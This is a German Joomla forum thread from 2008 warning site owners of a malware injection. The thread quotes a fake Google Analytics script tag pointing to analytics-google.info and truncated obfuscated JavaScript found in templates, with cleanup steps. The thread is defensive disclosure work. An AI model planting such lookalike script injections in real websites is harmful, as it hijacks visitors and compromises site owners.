Erweiterungen & Templates für Joomla     Support Chat     JoomlaJobs    

   

 

Zurück   Joomla CMS Support Forum > Joomla 1.0x > Sicherheit
Benutzername
Kennwort
Antwort
 
LinkBack Themen-Optionen Thema durchsuchen Ansicht

  #1 (permalink)
Alt 20.06.2008, 10:38
Moderator
 
Benutzerbild von holmi
 
Registriert seit: 30.08.2004
Ort: Harz
Beiträge: 6,486
Bedankte sich: 91
1,226 Danksagungen in 1,128 Beiträgen
holmi eine Nachricht über ICQ schicken holmi eine Nachricht über Skype™ schicken
Standard Sicherheitswarnung - analytics-google.info

analytics-google.info ist nicht von Google!

Die Seite wird hier bereits als Malware gelistet:
http://www.malwaredomainlist.com/mdl...cs-google.info


Es wird Code in die index.php vom Template eingeschleust der auf den ersten Blick wie der Tracking Code von Google Analytics aussieht
<script src="http://analytics-google.info/urchin.js"></script>

Original: <script src="http://www.google-analytics.com/urchin.js">

Neben diesem urchin.js wird weiterer verschlüsselter Code eingebunden:
http://www.joomlaportal.de/sicherhei...tml#post666372

Oben im Template:
<!-- ad --><script>function c1131313m4857aa739c121(m4857aa739c91a){ function m4857 .... usw.

Ganz am ende im Template:
<script>check_content()</script><!-- 1213806179 --><!-- ad --><script>function c1131313m4857aa739c121(m4857aa739c91a) ... usw.


Wenn der Code in der Seite enthalten ist, werden Besucher die die Seite bei Google in den Suchergebnissen anklicken
auf eine analytics-google.info Suchseite weitergeleitet.
Die Suchbegriffe mit der die original Seite bei Google gefunden wurde werden übernommen.

Von den neuen Suchergebnissen wird man dann über Affiliate Seiten auf weitere Seiten geleitet.


Infos durch welche Lücke der Code eingeschleust wird gibt es bist jetzt nicht.
Und es ist auch noch unbekannt ob noch mehr auf der Seite verändert wird.

Darum bleibt bis dahin nur die übliche Vorgehensweise:
http://www.joomlaportal.de/sicherhei...tml#post666781
Zitat:
Zitat von flotte Beitrag anzeigen
1) Sofort den gesamten Auftritt mit allen Dateien entfernen (sichern!)
2) Datenbankinhalt entfernen
3) Letzte definitv saubere Sicherung einspielen
4) Alle Passwörter ändern (Datenbank, Joomla, FTP, etc.)
5) Log-Dateien holen und Einbruchslücke lokalisieren
6) Lücke schließen!
Björn
__________________
Problem gelöst? Dann markiere den Thread mit [GELÖST]
holmi ist offline   Mit Zitat antworten
  #2 (permalink)
Alt 20.06.2008, 10:43
Moderator
 
Benutzerbild von holmi
 
Registriert seit: 30.08.2004
Ort: Harz
Beiträge: 6,486
Bedankte sich: 91
1,226 Danksagungen in 1,128 Beiträgen
holmi eine Nachricht über ICQ schicken holmi eine Nachricht über Skype™ schicken
Standard

Hier mal alle Threads aus dem Forum dazu die ich bisher gefunden habe:
http://www.joomlaportal.de/sicherhei...-verlinkt.html
http://www.joomlaportal.de/sicherhei...us-iframe.html
http://www.joomlaportal.de/installat...3-gehackt.html

Und hier einer der das phpwcms betrifft:
http://www.homepage-forum.de/showthread.php?t=38503


Weiter Links wo darüber gesprochen wird:
http://www.ayom.com/topic-25023.html

http://ddanchev.blogspot.com/2008/06...in-action.html
__________________
Problem gelöst? Dann markiere den Thread mit [GELÖST]
holmi ist offline   Mit Zitat antworten
  #3 (permalink)
Alt 20.06.2008, 19:05
Joomlapapst
 
Benutzerbild von serk
 
Registriert seit: 27.12.2006
Ort: Cologne
Beiträge: 762
Bedankte sich: 59
177 Danksagungen in 153 Beiträgen
Standard

Und damit es auch wirklich jeder mitbekommt, Yiggt das mal...

http://www.yigg.de/2065694

//Edit: @holmi, Mi-Schi ist der aus dem anderen Forum...
__________________
Wenn´s geholfen hat, Feedback geben, eventuell "Danke" drücken!

Virtuemart SEO | Virtuemart Templates & Themes | Joomlanews
serk ist offline   Mit Zitat antworten
  #4 (permalink)
Alt 03.08.2008, 12:00
Moderator
 
Benutzerbild von holmi
 
Registriert seit: 30.08.2004
Ort: Harz
Beiträge: 6,486
Bedankte sich: 91
1,226 Danksagungen in 1,128 Beiträgen
holmi eine Nachricht über ICQ schicken holmi eine Nachricht über Skype™ schicken
Standard

Die Domain analytics-google.info gibt es nicht mehr.


Wer den oben beschriebenen Code in seinem Template entdeckt sollte ihn aber löschen.
Und natürlich nach der Lücke suchen durch die der Code eingeschleust wurde!


Björn
__________________
Problem gelöst? Dann markiere den Thread mit [GELÖST]
holmi ist offline   Mit Zitat antworten
  #5 (permalink)
Alt 22.04.2009, 07:38
Joomla Newbie
 
Registriert seit: 22.04.2009
Beiträge: 2
Bedankte sich: 0
0 Danksagungen in 0 Beiträgen
Standard

sehr geniale Taktik. Ist es wirklich funktioniert?
__________________
Signatur wegen Regelverstoß gelöscht - jamfx
keloolan ist offline   Mit Zitat antworten
Werbung
Antwort


Themen-Optionen Thema durchsuchen
Thema durchsuchen:

Erweiterte Suche
Ansicht




Alle Zeitangaben in WEZ +1. Es ist jetzt 19:21 Uhr.

Powered by vBulletin Version 3.6.2 (Deutsch)
Copyright ©2000 - 2010, Jelsoft Enterprises Ltd.
Search Engine Friendly URLs by vBSEO 3.3.2
vBulletin Style by: vbdesigns.de
Copyright 2005 by Stefan Köller